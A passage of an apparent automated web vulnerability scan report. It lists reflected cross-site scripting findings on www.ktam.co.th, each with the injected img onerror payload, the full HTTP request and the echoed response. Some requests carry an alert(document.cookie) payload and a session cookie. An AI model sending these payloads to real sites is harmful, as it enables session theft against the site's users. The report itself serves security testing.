The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 991c8"><img%20src%3da%20onerror%3dalert(1)>9694ceaeb47 was submitted in the REST URL parameter 4. This input was echoed as 991c8\"><img src=a onerror=alert(1)>9694ceaeb47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/b_nav23.gif991c8"><img%20src%3da%20onerror%3dalert(1)>9694ceaeb47 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:18 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/b_nav23.gif991c8\"><img src=a onerror=alert(1)>9694ceaeb47" title="THAI">
...[SNIP]...

5.95. http://www.ktam.co.th/en/index.php/ims/bg_cr1.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_cr1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 924a6"><img%20src%3da%20onerror%3dalert(1)>d3d0793b7d5 was submitted in the REST URL parameter 4. This input was echoed as 924a6\"><img src=a onerror=alert(1)>d3d0793b7d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bg_cr1.gif924a6"><img%20src%3da%20onerror%3dalert(1)>d3d0793b7d5 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:31 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29523

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bg_cr1.gif924a6\"><img src=a onerror=alert(1)>d3d0793b7d5" title="THAI">
...[SNIP]...

5.96. http://www.ktam.co.th/en/index.php/ims/bg_head1.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_head1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a55c6"><img%20src%3da%20onerror%3dalert(1)>b558b73adaa was submitted in the REST URL parameter 4. This input was echoed as a55c6\"><img src=a onerror=alert(1)>b558b73adaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bg_head1.gifa55c6"><img%20src%3da%20onerror%3dalert(1)>b558b73adaa HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:54 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29525

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bg_head1.gifa55c6\"><img src=a onerror=alert(1)>b558b73adaa" title="THAI">
...[SNIP]...

5.97. http://www.ktam.co.th/en/index.php/ims/bg_mmenu01.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_mmenu01.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e495"><img%20src%3da%20onerror%3dalert(1)>b77eab408fe was submitted in the REST URL parameter 4. This input was echoed as 6e495\"><img src=a onerror=alert(1)>b77eab408fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bg_mmenu01.gif6e495"><img%20src%3da%20onerror%3dalert(1)>b77eab408fe HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:54 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29527

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bg_mmenu01.gif6e495\"><img src=a onerror=alert(1)>b77eab408fe" title="THAI">
...[SNIP]...

5.98. http://www.ktam.co.th/en/index.php/ims/bg_mmenu02.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_mmenu02.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c942"><img%20src%3da%20onerror%3dalert(1)>826aa00ad2 was submitted in the REST URL parameter 4. This input was echoed as 5c942\"><img src=a onerror=alert(1)>826aa00ad2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bg_mmenu02.gif5c942"><img%20src%3da%20onerror%3dalert(1)>826aa00ad2 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:00 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29526

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bg_mmenu02.gif5c942\"><img src=a onerror=alert(1)>826aa00ad2" title="THAI">
...[SNIP]...

5.99. http://www.ktam.co.th/en/index.php/ims/bg_search1.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_search1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fb94"><img%20src%3da%20onerror%3dalert(1)>85b4af7d086 was submitted in the REST URL parameter 4. This input was echoed as 2fb94\"><img src=a onerror=alert(1)>85b4af7d086 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bg_search1.gif2fb94"><img%20src%3da%20onerror%3dalert(1)>85b4af7d086 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:28 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29527

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bg_search1.gif2fb94\"><img src=a onerror=alert(1)>85b4af7d086" title="THAI">
...[SNIP]...

5.100. http://www.ktam.co.th/en/index.php/ims/bt_about1.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_about1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd94c"><img%20src%3da%20onerror%3dalert(1)>847b2be6901 was submitted in the REST URL parameter 4. This input was echoed as dd94c\"><img src=a onerror=alert(1)>847b2be6901 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bt_about1.gifdd94c"><img%20src%3da%20onerror%3dalert(1)>847b2be6901 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:58 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29526

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bt_about1.gifdd94c\"><img src=a onerror=alert(1)>847b2be6901" title="THAI">
...[SNIP]...

5.101. http://www.ktam.co.th/en/index.php/ims/bt_agent1.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_agent1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 225c7"><img%20src%3da%20onerror%3dalert(1)>ee9e5de15ec was submitted in the REST URL parameter 4. This input was echoed as 225c7\"><img src=a onerror=alert(1)>ee9e5de15ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bt_agent1.gif225c7"><img%20src%3da%20onerror%3dalert(1)>ee9e5de15ec HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:07 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29526

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bt_agent1.gif225c7\"><img src=a onerror=alert(1)>ee9e5de15ec" title="THAI">
...[SNIP]...

5.102. http://www.ktam.co.th/en/index.php/ims/bt_education_center1.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_education_center1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41001"><img%20src%3da%20onerror%3dalert(1)>a19663f1591 was submitted in the REST URL parameter 4. This input was echoed as 41001\"><img src=a onerror=alert(1)>a19663f1591 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bt_education_center1.gif41001"><img%20src%3da%20onerror%3dalert(1)>a19663f1591 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:01 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29537

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bt_education_center1.gif41001\"><img src=a onerror=alert(1)>a19663f1591" title="THAI">
...[SNIP]...

5.103. http://www.ktam.co.th/en/index.php/ims/bt_home2.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_home2.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28774"><img%20src%3da%20onerror%3dalert(1)>8c408bdb0a was submitted in the REST URL parameter 4. This input was echoed as 28774\"><img src=a onerror=alert(1)>8c408bdb0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bt_home2.gif28774"><img%20src%3da%20onerror%3dalert(1)>8c408bdb0a HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:53 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bt_home2.gif28774\"><img src=a onerror=alert(1)>8c408bdb0a" title="THAI">
...[SNIP]...

5.104. http://www.ktam.co.th/en/index.php/ims/bt_news1.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_news1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ee5"><img%20src%3da%20onerror%3dalert(1)>d1f09911baa was submitted in the REST URL parameter 4. This input was echoed as b0ee5\"><img src=a onerror=alert(1)>d1f09911baa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bt_news1.gifb0ee5"><img%20src%3da%20onerror%3dalert(1)>d1f09911baa HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:03 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29525

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bt_news1.gifb0ee5\"><img src=a onerror=alert(1)>d1f09911baa" title="THAI">
...[SNIP]...

5.105. http://www.ktam.co.th/en/index.php/ims/bt_service1.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_service1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d355c"><img%20src%3da%20onerror%3dalert(1)>ae21f0a9811 was submitted in the REST URL parameter 4. This input was echoed as d355c\"><img src=a onerror=alert(1)>ae21f0a9811 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/bt_service1.gifd355c"><img%20src%3da%20onerror%3dalert(1)>ae21f0a9811 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:00 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29528

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/bt_service1.gifd355c\"><img src=a onerror=alert(1)>ae21f0a9811" title="THAI">
...[SNIP]...

5.106. http://www.ktam.co.th/en/index.php/ims/cmd_search1.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/cmd_search1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab120"><img%20src%3da%20onerror%3dalert(1)>9dcde303979 was submitted in the REST URL parameter 4. This input was echoed as ab120\"><img src=a onerror=alert(1)>9dcde303979 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/cmd_search1.gifab120"><img%20src%3da%20onerror%3dalert(1)>9dcde303979 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:58 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29528

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/cmd_search1.gifab120\"><img src=a onerror=alert(1)>9dcde303979" title="THAI">
...[SNIP]...

5.107. http://www.ktam.co.th/en/index.php/ims/empty.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/empty.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df065"><img%20src%3da%20onerror%3dalert(1)>1a8c6c1b882 was submitted in the REST URL parameter 4. This input was echoed as df065\"><img src=a onerror=alert(1)>1a8c6c1b882 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/empty.gifdf065"><img%20src%3da%20onerror%3dalert(1)>1a8c6c1b882 HTTP/1.1
Host: www.ktam.co.th
